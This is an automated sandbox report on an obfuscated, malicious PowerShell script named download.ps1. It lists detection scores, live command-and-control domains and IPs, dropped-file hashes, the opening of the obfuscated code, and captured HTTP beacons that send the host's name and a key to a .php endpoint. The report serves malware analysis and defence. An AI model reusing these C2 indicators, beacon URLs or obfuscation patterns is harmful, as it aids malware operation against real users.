Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps117%VirustotalBrowse
download.ps18%ReversingLabsScript.Trojan.Heuristic
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.251.32.36
truefalse
    high
    gajaechkfhfghal.top
    45.61.136.138
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8X6ukQzO4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
        high
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://$zmtpqkiyrv4wb3j/$3xbonqgscw6vtrh.php?id=$env:computername&key=$gqsylrwkvhi&s=527powershell.exe, 00000000.00000002.2724001546.0000029A28A9C000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              http://gajaechkfhfghal.toppowershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A286F9000.00000004.00000800.00020000.00000000.sdmpfalse
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8powershell.exe, 00000000.00000002.2724001546.0000029A2891C000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://$zmtpqkiyrv4wb3j/$3xbonqgscw6vtrh.php?powershell.exe, 00000000.00000002.2724001546.0000029A28A9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28C38000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/recaptcha/api.jspowershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A2892F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28929000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.google.compowershell.exe, 00000000.00000002.2724001546.0000029A2891C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.quovadis.bm0powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/Pester/PesterXzpowershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjDpowershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.2724001546.0000029A278D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.micrpowershell.exe, 00000000.00000002.2753530709.0000029A3F8F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2724001546.0000029A278D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              45.61.136.138
                                                              gajaechkfhfghal.topUnited States
                                                              40676AS40676USfalse
                                                              142.251.32.36
                                                              www.google.comUnited States
                                                              15169GOOGLEUSfalse
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1579696
                                                              Start date and time:2024-12-23 07:47:01 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 5m 44s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                              Run name:Suspected VM Detection
                                                              Number of analysed new started processes analysed:3
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:download.ps1
                                                              Detection:MAL
                                                              Classification:mal64.evad.winPS1@2/7@2/2
                                                              EGA Information:Failed
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 18
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .ps1
                                                              • Stop behavior analysis, all processes terminated
                                                              • Exclude process from analysis (whitelisted): WmiPrvSE.exe
                                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 4640 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              TimeTypeDescription
                                                              01:49:05API Interceptor30x Sleep call for process: powershell.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              AS40676USloligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                              • 107.176.168.244
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                              • 45.61.136.138
                                                              No context
                                                              No context
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:@...e...........................................................
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6222
                                                              Entropy (8bit):3.7368973938010184
                                                              Encrypted:false
                                                              SSDEEP:96:Yf5cojCtGFlkvhkvCCtxxDsfpHOxDsfkrHj:c5cCXvDAWDAi
                                                              MD5:5E73A351C0C79FAAC01975469D6A0C93
                                                              SHA1:878F25F2930F39D5219E90EE7E15BA237E50D626
                                                              SHA-256:D30C610FE6B556A7E763DAC2D24DEDDF0A0CE92360EDAF4B264E4666DE3B082C
                                                              SHA-512:92B2245AC749CF73F9797311FC6172A710B03E32CCBE158A848B58E3EBA8541EE47F1ACC8354236FCEEE92A57917F9194F02FB07FA58296D41F6C17ED0D83F10
                                                              Malicious:false
                                                              Preview:...................................FL..................F.".. ...;.}.S...3.$..U..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...k...U...L)..U......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.6....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.6..Roaming.@......"S.Y.6....D.....................U...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.6....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y....Windows.@......"S.Y......F.....................Go+.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y......H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y......I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y......J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y"6....i...........
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6222
                                                              Entropy (8bit):3.7368973938010184
                                                              Encrypted:false
                                                              SSDEEP:96:Yf5cojCtGFlkvhkvCCtxxDsfpHOxDsfkrHj:c5cCXvDAWDAi
                                                              MD5:5E73A351C0C79FAAC01975469D6A0C93
                                                              SHA1:878F25F2930F39D5219E90EE7E15BA237E50D626
                                                              SHA-256:D30C610FE6B556A7E763DAC2D24DEDDF0A0CE92360EDAF4B264E4666DE3B082C
                                                              SHA-512:92B2245AC749CF73F9797311FC6172A710B03E32CCBE158A848B58E3EBA8541EE47F1ACC8354236FCEEE92A57917F9194F02FB07FA58296D41F6C17ED0D83F10
                                                              Malicious:false
                                                              Preview:...................................FL..................F.".. ...;.}.S...3.$..U..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...k...U...L)..U......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.6....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.6..Roaming.@......"S.Y.6....D.....................U...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.6....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y....Windows.@......"S.Y......F.....................Go+.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y......H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y......I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Y......J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y"6....i...........
                                                              File type:ASCII text, with very long lines (10990), with CRLF line terminators
                                                              Entropy (8bit):5.952403909557925
                                                              TrID:
                                                                File name:download.ps1
                                                                File size:20'062 bytes
                                                                MD5:59908f67a71ad9340c677542cc600f9e
                                                                SHA1:1213cf8e1e34acd11a68e6b4c4f4ce97abe06901
                                                                SHA256:0fd9309ca77dbf0977bbfa58941ef51ed866d6e79f03e5ba89e31743b8627901
                                                                SHA512:dfbce4da82f166ca2d3732354cac24e7d390cd59d9fe37781dbd7dfa8ccb72c26a266673a2d57eab0fde3bd02fa6170ca8a7b260d529910839d351f284fd645e
                                                                SSDEEP:384:rWlP/MWwwQ+e6wFk8mvyC2GNtErLaogF1jDl9i5dSTKnCDJI:/FydwrCyCzacziQKnCu
                                                                TLSH:0E926CF12748E4D2C29DD66EBF067C182BA4711FD9DB65C0BB7AC0D23360251AF88E41
                                                                File Content Preview:$kzfyrqpsetnimx=$executioncontext;$beanatonedanisorisisbe = -join (0..54 | ForEach-Object {[char]([int]"0000000000000132000000000000013100000000000001360000000000000129000000000000013500000000000001330000000000000135000000000000013400000000000001340000000
                                                                Icon Hash:3270d6baae77db44
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 23, 2024 07:49:08.229964972 CET4971580192.168.11.2045.61.136.138
                                                                Dec 23, 2024 07:49:08.405514002 CET804971545.61.136.138192.168.11.20
                                                                Dec 23, 2024 07:49:08.405786991 CET4971580192.168.11.2045.61.136.138
                                                                Dec 23, 2024 07:49:08.408530951 CET4971580192.168.11.2045.61.136.138
                                                                Dec 23, 2024 07:49:08.583781958 CET804971545.61.136.138192.168.11.20
                                                                Dec 23, 2024 07:49:08.640988111 CET804971545.61.136.138192.168.11.20
                                                                Dec 23, 2024 07:49:08.686022043 CET4971580192.168.11.2045.61.136.138
                                                                Dec 23, 2024 07:49:08.808746099 CET4971680192.168.11.20142.251.32.36
                                                                Dec 23, 2024 07:49:08.972765923 CET8049716142.251.32.36192.168.11.20
                                                                Dec 23, 2024 07:49:08.972948074 CET4971680192.168.11.20142.251.32.36
                                                                Dec 23, 2024 07:49:08.973097086 CET4971680192.168.11.20142.251.32.36
                                                                Dec 23, 2024 07:49:09.136820078 CET8049716142.251.32.36192.168.11.20
                                                                Dec 23, 2024 07:49:09.543757915 CET8049716142.251.32.36192.168.11.20
                                                                Dec 23, 2024 07:49:09.543770075 CET8049716142.251.32.36192.168.11.20
                                                                Dec 23, 2024 07:49:09.544033051 CET4971680192.168.11.20142.251.32.36
                                                                Dec 23, 2024 07:49:09.546180964 CET4971680192.168.11.20142.251.32.36
                                                                Dec 23, 2024 07:49:09.709980965 CET8049716142.251.32.36192.168.11.20
                                                                Dec 23, 2024 07:49:09.718938112 CET8049716142.251.32.36192.168.11.20
                                                                Dec 23, 2024 07:49:09.719172001 CET8049716142.251.32.36192.168.11.20
                                                                Dec 23, 2024 07:49:09.719183922 CET8049716142.251.32.36192.168.11.20
                                                                Dec 23, 2024 07:49:09.719430923 CET4971680192.168.11.20142.251.32.36
                                                                Dec 23, 2024 07:49:09.829577923 CET4971680192.168.11.20142.251.32.36
                                                                Dec 23, 2024 07:49:09.829691887 CET4971580192.168.11.2045.61.136.138
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 23, 2024 07:49:08.023029089 CET6029153192.168.11.201.1.1.1
                                                                Dec 23, 2024 07:49:08.221796989 CET53602911.1.1.1192.168.11.20
                                                                Dec 23, 2024 07:49:08.642975092 CET5930353192.168.11.201.1.1.1
                                                                Dec 23, 2024 07:49:08.806988001 CET53593031.1.1.1192.168.11.20
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 23, 2024 07:49:08.023029089 CET192.168.11.201.1.1.10x1c8Standard query (0)gajaechkfhfghal.topA (IP address)IN (0x0001)false
                                                                Dec 23, 2024 07:49:08.642975092 CET192.168.11.201.1.1.10x78e3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 23, 2024 07:49:08.221796989 CET1.1.1.1192.168.11.200x1c8No error (0)gajaechkfhfghal.top45.61.136.138A (IP address)IN (0x0001)false
                                                                Dec 23, 2024 07:49:08.806988001 CET1.1.1.1192.168.11.200x78e3No error (0)www.google.com142.251.32.36A (IP address)IN (0x0001)false
                                                                • gajaechkfhfghal.top
                                                                • www.google.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.11.204971545.61.136.138804640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 23, 2024 07:49:08.408530951 CET215OUTGET /kqubowg9xhhtr.php?id=computer&key=39968631184&s=527 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                Host: gajaechkfhfghal.top
                                                                Connection: Keep-Alive
                                                                Dec 23, 2024 07:49:08.640988111 CET166INHTTP/1.1 302 Found
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Mon, 23 Dec 2024 06:49:08 GMT
                                                                Content-Length: 0
                                                                Connection: keep-alive
                                                                Location: http://www.google.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.11.2049716142.251.32.36804640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 23, 2024 07:49:08.973097086 CET159OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                Host: www.google.com
                                                                Connection: Keep-Alive
                                                                Dec 23, 2024 07:49:09.543757915 CET1289INHTTP/1.1 302 Found
                                                                Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8X6ukQzO4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                x-hallmonitor-challenge: CgwI5Y-kuwYQ_5vI1wESBGaB_Jo
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-111fV0hCCB_HLdyaT01Fcg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                Date: Mon, 23 Dec 2024 06:49:09 GMT
                                                                Server: gws
                                                                Content-Length: 396
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                Set-Cookie: AEC=AZ6Zc-XMB96GgCfCli2mBMGeh38adruAItuEf5lXBMeGPN_rfs6dKFyCaFY; expires=Sat, 21-Jun-2025 06:49:09 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                Set-Cookie: NID=520=FdSNZsJ7WO5j41urd6xg3Kkqe8OCGnQ0lkregDZIPnAPFY9IuPSGHKhcxcpV9WfSIzmZeIGW2P3n59N_pf4Pwyyrw2yzX1dTOgcdiSF0bvkufPLdDqeCy2GhbSkGCzVgpCt4huF_933eu1_eRw0KgItJsiOaJ0OyuDqKUotptyZfoLRQqfmtKJCmzVgBo-HG0ef8; expires=Tue, 24-Jun-2025 06:49:09 GMT; path=/; domain=.google.com; HttpOnly
                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74
                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/ht
                                                                Dec 23, 2024 07:49:09.543770075 CET336INData Raw: 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f
                                                                Data Ascii: ml;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://www.google.com/&amp;q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS
                                                                Dec 23, 2024 07:49:09.546180964 CET522OUTGET /sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8X6ukQzO4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                Host: www.google.com
                                                                Cookie: NID=520=FdSNZsJ7WO5j41urd6xg3Kkqe8OCGnQ0lkregDZIPnAPFY9IuPSGHKhcxcpV9WfSIzmZeIGW2P3n59N_pf4Pwyyrw2yzX1dTOgcdiSF0bvkufPLdDqeCy2GhbSkGCzVgpCt4huF_933eu1_eRw0KgItJsiOaJ0OyuDqKUotptyZfoLRQqfmtKJCmzVgBo-HG0ef8
                                                                Dec 23, 2024 07:49:09.718938112 CET1289INHTTP/1.1 429 Too Many Requests
                                                                Date: Mon, 23 Dec 2024 06:49:09 GMT
                                                                Pragma: no-cache
                                                                Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Content-Type: text/html
                                                                Server: HTTP server (unknown)
                                                                Content-Length: 3076
                                                                X-XSS-Protection: 0
